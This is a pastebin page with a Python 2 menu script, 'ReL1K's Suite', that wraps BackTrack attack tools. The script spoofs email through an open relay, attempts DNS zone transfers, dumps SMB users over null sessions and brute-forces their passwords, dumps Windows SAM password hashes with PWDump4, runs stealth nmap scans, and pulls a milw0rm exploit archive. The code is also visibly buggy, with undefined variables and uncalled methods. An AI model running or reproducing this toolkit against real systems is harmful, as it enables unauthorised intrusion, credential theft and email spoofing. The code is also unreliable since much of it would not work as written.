Part of Slepp's ProjectsPastebinTURLImagebinFilebin
Feedback -- English French German Japanese
Create Upload Newest Tools Donate
Sign In | Create Account

Paste Description for ReL1K's Suite

entire exploit suite for backtrack

ReL1K's Suite
Monday, April 23rd, 2007 at 3:28:01pm UTC 

  1. #! /usr/bin/python
  2. # Back|Track V2.0 Attack Module
  3. # Created by: ReL1K
  4. #
  5. # Remember to chmod 755 btupdate.py
  6. #
  7.  
  8.  
  9. import os
  10. import smtplib
  11. import time
  12. import dns.zone
  13. import dns.query
  14. import dns.resolver
  15. import sys
  16. from dns.rdatatype import *
  17. from dns.rdataclass import *
  18. from dns.exception import DNSException
  19.  
  20. print """
  21.  
  22. Back|Track v2.0 Final Toolset
  23. Written by: ReL1K
  24.    
  25.  
  26. """
  27.  
  28.  
  29. # Main Menu to choose
  30.  
  31. while 1==1 :
  32.     mainmenu=raw_input("""Back|Track Main Menu:
  33.    
  34.     1. Back|Track Updates
  35.     2. External Attack and Penetration
  36.     3. Internal Attack and Penetration
  37.     4. Wireless Assessment
  38.     5. Fuzzers
  39.     6. Exit
  40.  
  41.     Enter the number: """)
  42. # End Main Menu
  43.  
  44. # End loop with option 5
  45.  
  46.     if mainmenu == ('6'):
  47.       print """
  48.  
  49.          ****    QUITTING   ****
  50.      
  51.       """
  52.       break
  53.  
  54. # End loop
  55.  
  56. # Start BackTrack Updates
  57.      
  58.     if mainmenu == ('1'):
  59.         while 1==1 :
  60.            blah=raw_input("""Enter a number to update
  61.  
  62.     1. Metasploit 2
  63.     2. Metasploit 3
  64.     3. Aircrack-NG
  65.     4. Kismet
  66.     5. Milw0rm
  67.     6. Install Aircrack-PTW
  68.     7. Return to Main Menu
  69.  
  70.     Enter number: """)
  71.  
  72.            if blah == '1':
  73.               print """
  74.  
  75.               **** Updating Metasploit v2 ****
  76.  
  77.               """
  78.               a=os.system("svn update /pentest/exploits/framework2/")
  79.               print a     
  80.            if blah == '2':
  81.              print """
  82.  
  83.               **** Updating Metasploit v3 ****
  84.  
  85.               """
  86.              b=os.system("svn update /pentest/exploits/framework3/")
  87.              print b
  88.            if blah == '3':
  89.              print """
  90.  
  91.               **** Updating AirCrack-NG ****
  92.  
  93.               """
  94.              c=os.system("svn co http://trac.aircrack-ng.org/svn/trunk/ /pentest/wireless/aircrack-ng;cd /pentest/wireless/aircrack-ng;make clean && make && make install")
  95.              print c
  96.            if blah == '4':
  97.              print """
  98.  
  99.              **** Updating Kismet ****
  100.  
  101.               """
  102.              d=os.system("svn co http://svn.kismetwireless.net/code/trunk /pentest/wireless/kismet;cd /pentest/wireless/kismet;./configure && make clean && make && make install")
  103.              print d
  104.            if blah == '5':
  105.              print """
  106.  
  107.              **** Updating Milw0rm ****
  108.  
  109.              """
  110.  
  111.              e=os.system("cd /pentest/exploits;wget http://www.milw0rm.com/sploits/milw0rm.tar.bz2;tar jxpf milw0rm.tar.bz2;rm milw0rm.tar.bz2;cd milw0rm;./makeindex-milw0rm &&")
  112.              print e
  113.            if blah == '6':
  114.              print """
  115.  
  116.              **** Adding AirCrack-PTW to Back|Track ****
  117.  
  118.              """
  119.  
  120.              f=os.system("cd /pentest/wireless;wget http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/download/aircrack-ptw-1.0.0.tar.gz;tar -zxvf aircrack-ptw-1.0.0.tar.gz;cd aircrack-ptw-1.0.0;gcc -o aircrack-ptw -Wall -fomit-frame-pointer -O3 -lpcap aircrack-ptw.c aircrack-ptw-lib.c -lpcap ;cp aircrack-ptw /usr/local/bin;rm /pentest/wireless/aircrack-ptw-1.0.0.tar.gz;chmod 755 /usr/local/bin/aircrack-ptw")
  121.              print f
  122.            if blah == '7':
  123.              print """
  124.  
  125.              **** Exiting Menu ****
  126.  
  127.              """
  128.              break
  129.  
  130. # End Back|Track Updates                   
  131.  
  132. # Start External Attack and Penetration
  133.  
  134.     if mainmenu == '2':
  135.        while 1==1:
  136.           menu = raw_input("""Lets do this:
  137.  
  138.    
  139.        1. Enumeration
  140.        2. Port Scanning
  141.        3. Mail Relay
  142.        4. Zone Transfer
  143.        5. Exploitation
  144.        6. SQL Injection spawn XP_Cmdshell
  145.        7. Return to Previous Menu
  146.        
  147.        Enter a number: """)
  148.    
  149.           if menu == '3' :
  150.  
  151.           # Mail Relay Written by ReL1K
  152.  
  153.              ab1 = raw_input ("Enter From: ")
  154.              ab2 = raw_input ("Enter To: ")
  155.              ab5 = time.ctime(time.time())
  156.              ab3 = raw_input ("Enter Subject: ")
  157.              ab4 = raw_input ("Enter Message: ")
  158.              ab6 = ('From: %s\nTo: %s\nDate: %s\nSubject: %s\n%s\n' % (ab1,ab2,ab5,ab3,ab4))
  159.              
  160.              server= raw_input("Enter servername: ")
  161.              print "Sending the mail now..."
  162.              mailsend= smtplib.SMTP('%s' % (server))
  163.              code = mailsend.sendmail(ab1, ab2, ab6)
  164.              s.quit()
  165.              if code:
  166.                  print "Didn't send successfully"
  167.              else:
  168.                  print "It worked!"
  169.          
  170.            # End Mail Relay
  171. # Starting Zone Transfer
  172. # By ReL1K
  173.  
  174.           if menu == '4':
  175.            
  176.              domain = raw_input ("Enter domain name: ")
  177.              print ("Looking up NS for domain %s" % (domain))
  178.              resolve = dns.resolver.query(domain, 'NS')
  179.              ns= []
  180.              for rdata in resolve:
  181.                  n = str(rdata)
  182.                  print "Name server found:", n
  183.                  ns.append
  184.  
  185.              for n in ns:
  186.                 print "Attempting a zone transfer..."
  187.                 try:
  188.                  
  189.                     zonetransfer = dns.zone.from_xfr(dns.query.xfr(n, domain))
  190.                     print "\nPrinting results..."
  191.                     for name, node in zone.nodes.items():
  192.                         rdataset = node.rdatasets
  193.                         for record in rdataset:
  194.                             print >> logfile, 'name, record'
  195.                            
  196.  
  197.                 except DNSException, e:
  198.                     print e.___class___, e
  199.  
  200.          
  201. #End Zone Transfer
  202.  
  203. # start option 7 menu
  204.  
  205.           if menu == '7' :
  206.              print """
  207.  
  208.                ***** Returning to Previous Menu *****
  209.      
  210.  
  211.              """
  212.              break
  213.  
  214. # End option 7 exit
  215.  
  216. # Start Internal Attack and Penetration Option 3
  217.  
  218.     if mainmenu == '3' :
  219.        while 1==1:
  220.           intmenu=raw_input("""What doya wanta do:
  221.  
  222.          
  223.    1. Null Session User Dump and Brute Force (lowercase, upper, and blank)
  224.    2. Blank SQL Ping and Auto Spawn XP_Cmdshell
  225.    3. Port Scanning
  226.    4. Dump SAM
  227.    5. Prep your box for this menu
  228.    6. Go Back a previous menu
  229.  
  230.    Enter a number: """)
  231.  
  232. # Start Option 1 SMB Brute Force
  233.  
  234.           if intmenu == '1':
  235.              input1=raw_input("Enter the IP address: ")
  236.              smb=os.system("/pentest/enumeration/smb-enum/smbdumpusers -i %s -v -r /root/internalap/%sdumpusers.txt" % (input1,input1))
  237.              print smb
  238.              smbbf=os.system("/pentest/enumeration/smb-enum/smbbf -i %s -p /root/internalap/smbpasslist.txt -u /root/internalap/%sdumpusers.txt -r /root/internalap/%ssmbsuccess.txt -v" % (input1,input1,input1))
  239.              print smbbf
  240.              print """
  241.  
  242.    When completed, your results will be in /root/internalap/smbsuccess.txt
  243.  
  244.             """
  245.  
  246. # Option 1 SMB Brute Force END
  247.  
  248. # Option 3 Port Scanning
  249.  
  250.           if intmenu == '3':
  251.              portmenu=raw_input("""What type of scan:
  252.  
  253.  
  254.     1. Stealth SYN
  255.     2. Stealth TCP
  256.  
  257.     Choose a number:  """)
  258.  
  259.             # Chose 1 Syn Scan
  260.              if portmenu == '1':
  261.                 synip=raw_input("Enter the IP: ")
  262.                 syn=os.system("nmap -sS -O -v -P0 %s > /root/internalap/%sportscan.txt" % (synip,synip))
  263.                 print syn
  264.                 print "*** Results will be printed in /pentest/internalap under <ip>portscan.txt ***"
  265.             # Chose 2 TCP Scan
  266.              if portmenu == '2':
  267.                 tcpip=raw_input("Enter the IP: ")
  268.                 tcp=os.system("nmap -sT -O -v -P0 %s > /root/internalap/%sportscan.txt" % (synip,synip))
  269.                 print tcp
  270.                 print "*** Results will be printed in /root/internalap under <ip>portscan.txt ***"
  271.            
  272. # End Port Scan
  273.  
  274. # Start SAM SUMP
  275.  
  276.           if intmenu == '4':
  277.              ipdump=raw_input("Enter the IP of server: ")
  278.              ipuser=raw_input("Enter the Username (example domain\user): ")
  279.              sam=os.system("/pentest/windows-binaries/passwd-attack/wine PWDump4.exe %s /u: %s /o: /root/internalap/%ssamdump.txt" % (ipdump,ipuser,ipdump))
  280.              print sam
  281.  
  282.  
  283. # End SAM DUMP
  284.  
  285. # Option 5 Start PREP
  286.  
  287.           if intmenu == '5':
  288.              print """
  289.  
  290.      ****** Prepping your Box ******
  291.  
  292.                    """
  293.              c=os.system("rm -rf /root/internalap")
  294.              a=os.system("mkdir /root/internalap")
  295.              b=os.system('echo -e "\nlc %username%\nuc %username%" > /root/internalap/smbpasslist.txt')
  296.              print c
  297.              print a
  298.              print b
  299.              print """
  300.  
  301.      ****** Your results will be piped to /root/internalap ******
  302.  
  303.              """
  304.  
  305. # Option 5 Prep END
  306.  
  307. # Option 6 Previous Menu
  308.  
  309.           if intmenu == '6':
  310.              print """
  311.  
  312.      ****** Returning to previous menu ******
  313.  
  314.              """
  315.              break
  316.  
  317. # End Option 6 Previous Menu
  318.  
  319. # Starting Main Menu 6 Fuzzers

Update the Post

Either update this post and resubmit it with changes, or make a new post.

You may also comment on this post.

update paste below
details of the post (optional)

Note: Only the paste content is required, though the following information can be useful to others.

Save name / title?

(space separated, optional)



Please note that information posted here will expire by default in one month. If you do not want it to expire, please set the expiry time above. If it is set to expire, web search engines will not be allowed to index it prior to it expiring. Items that are not marked to expire will be indexable by search engines. Be careful with your passwords. All illegal activities will be reported and any information will be handed over to the authorities, so be good.

comments powered by Disqus
worth-right
worth-right
worth-right